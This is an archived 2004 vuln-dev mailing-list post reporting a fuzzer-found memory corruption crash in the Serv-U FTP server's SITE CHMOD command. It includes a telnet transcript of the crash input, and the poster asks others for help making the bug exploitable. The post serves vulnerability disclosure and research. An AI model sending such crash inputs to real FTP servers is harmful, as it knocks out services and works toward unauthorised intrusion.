Serv-U 4.1 Memory Corruption / Whatever

From: Der Ago (maillist_at_bastart.eu.org)
Date: 02/16/04

  • Next message: AJ McKee: "RE: Messenger Pro 3 from Clickatell.{Allows you to spoof Mobile Numbers}"
    Date: Mon, 16 Feb 2004 22:10:57 +0100
    To: vuln-dev@securityfocus.com
    
    

    Well, I didn't have the time to fully analyze it yet, but by using a
    fuzzer to check
    Serv-U, I found something that crashed it using bad data in SITE CHMOD.
    This is
    not the already discovered vulnerability, cause it can be used without
    write access,
    the crash occurs before permissions are even checked. Seems like an
    off-by-two,
    cause you can control 2 bytes of a dword where your buffer gets written,
    but I wasn't
    able to find how the other 2 bytes are controlled yet, and I wasn't able
    to do anything
    useful with the 2 bytes I have cause they can't be NULL. Well, I hope
    someone can
    enlighten me a little, cause I tried the last 2 days and now I'm out of
    ideas.

    hello@proxy:~# telnet ftp.target.com 21
    Trying 127.0.0.1...
    Connected to 127.0.0.1.
    Escape character is '^]'.
    220 Serv-U FTP Server v4.0 for WinSock ready...
    USER myuser
    331 User name okay, need password.
    PASS mypass
    230 User logged in, proceed.
    SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    Connection closed by foreign host.
    hello@proxy:~#

    this will cause this an ccess violation writing to 0x555551AD (UUQ-)


  • Next message: AJ McKee: "RE: Messenger Pro 3 from Clickatell.{Allows you to spoof Mobile Numbers}"

    Relevant Pages